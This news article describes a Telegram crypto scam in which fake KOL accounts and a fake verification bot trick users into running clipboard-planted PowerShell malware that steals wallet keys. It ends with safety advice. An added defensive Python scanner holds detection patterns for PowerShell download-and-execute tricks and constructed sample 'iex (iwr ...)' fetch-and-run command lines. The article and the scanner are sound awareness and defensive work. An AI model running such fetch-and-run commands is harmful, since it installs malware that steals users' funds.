A new form of Crypto scam appears via Telegram

Users need to be more cautious when entering the crypto market, as scam tricks are becoming more sophisticated and diverse.

Scam Sniffer, the Web3 crime prevention company, posted a warning about a sophisticated new form of scam that targets crypto users through the Telegram platform.

According to Scam Sniffer, scammers take advantage of the images of well-known KOLs (Key Opinion Leaders) in the crypto community to create false trust. They create fake accounts with names and pictures identical to these KOLs, and then comment on legitimate posts to build credibility.

The hackers used fake Telegram verification methods. Source: ScamSniffer.

In these comments, they invite users to participate in “exclusive” Telegram groups, with the promise of providing confidential investment information or superior earning opportunities that only the invitees know.

When users join these groups, they are immediately asked to verify their identity through a bot called “OfficiaiSafeGuardBot.” This is a fake bot, designed to trick users by creating a false sense of emergency.

Fake KOL accounts are used to trick users. Source: Scam Sniffer.

The bots often state that the verification window is very short, only a few minutes, leaving users with too little time to check the authenticity of the bot or the Telegram group they are joining. This pressure makes many people drop their guard and follow the bot's request in a hurry.

The user falls into the trap when pressing verify. Source: ScamSniffer.

The verification process is essentially a sophisticated trap. The bot asks the user to execute a command or a piece of code, and in the process malicious PowerShell code is placed in their clipboard.

Once this snippet is executed, it automatically downloads and activates the malware on the user's computer or device. This malware is capable of stealing sensitive information, including the private keys of the crypto wallet, and with them all the assets in the wallet.
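As an added defensive example (not from Scam Sniffer's report or the original article), the Python code below checks text that is about to be pasted into a terminal for general PowerShell download-and-run indicators, including commands hidden behind `-EncodedCommand`. The function names, the indicator list and the sample strings are assumptions constructed for illustration.

```python
import base64
import re

# Heuristic indicators chosen for this example (assumptions, not from the report).
INDICATORS = {
    "powershell_invoked": re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I),
    "download": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "dynamic_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"(?<!\S)-w\w*\s+hidden\b", re.I),
    "policy_bypass": re.compile(r"(?<!\S)-e(p|x\w*)\s+bypass\b", re.I),
    "url": re.compile(r"https?://", re.I),
}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE text).
ENCODED = re.compile(r"(?<!\S)-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def scan_clipboard_text(text):
    """Return the sorted names of indicators found in text about to be pasted."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    for match in ENCODED.finditer(text):
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
        except ValueError:  # not valid base64, or not UTF-16LE text
            continue
        hits.add("encoded_command")
        # Re-scan the decoded payload so hidden download/exec calls are reported too.
        hits.update(name for name, rx in INDICATORS.items() if rx.search(decoded))
    return sorted(hits)


def is_risky(text):
    """True when the text looks like a paste-and-run download or obfuscated command."""
    hits = set(scan_clipboard_text(text))
    return bool(
        "encoded_command" in hits
        or {"download", "dynamic_exec"} <= hits
        or ("powershell_invoked" in hits and hits & {"hidden_window", "policy_bypass"})
    )


# Constructed samples (example.invalid never resolves); not taken from the report.
SAMPLE_PLAIN = 'powershell -w hidden -c "iex (iwr https://example.invalid/verify)"'
SAMPLE_ENCODED = "powershell -enc " + base64.b64encode(
    "iex (iwr https://example.invalid/verify)".encode("utf-16-le")).decode()
SAMPLE_BENIGN = "Meeting notes: https://example.invalid/agenda"

if __name__ == "__main__":
    for sample in (SAMPLE_PLAIN, SAMPLE_ENCODED, SAMPLE_BENIGN):
        print(is_risky(sample), scan_clipboard_text(sample))
```

A match is a reason to stop and inspect the text, not proof of malware; a clean result does not make an unknown command safe to run.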

It is worth noting that this type of malicious code has been detected and flagged as dangerous by security systems such as VirusTotal. However, it still spreads very quickly because it combines psychological deception with technology so effectively.

Malicious source code is detected inside fake SafeGuard confirmations. Source: ScamSniffer.
 

There have been many victims of this form of fraud. Not only did they lose control of the crypto wallet, but other important personal information was compromised, with serious financial consequences.

This is not just a form of phishing (spoofing emails or websites to steal information); it goes a step further by combining social engineering with malware. This shows the increasing sophistication of these forms of attack in the crypto space.

Cold wallets are one of the most secure crypto storage methods out there. Source: Plasbit.

To protect themselves from these threats, users need to adhere to a number of important principles.

First, never execute commands or snippets of code that you don't fully understand, especially when they come from unreliable sources. Always check the authenticity of the Telegram channels or groups you join, and be wary of verification requests that impose a short deadline or time pressure.

Use a hardware wallet to store your crypto assets, since this type of wallet does not connect directly to the internet and is therefore more secure from cyber attacks.

Also, avoid installing any software of unknown origin, especially if the software requires access to your system or sensitive information.

This form of fraud represents a new step in the way cybercriminals target crypto users. It not only takes advantage of community trust in KOLs but also incorporates sophisticated psychological tactics and malicious code to steal property.

Raising awareness of these threats and sharing information to protect communities is essential in the context of increasingly sophisticated phishing tricks.

Anyone who is not careful can become a victim of these schemes. Always be vigilant and follow safety measures to protect your property and information.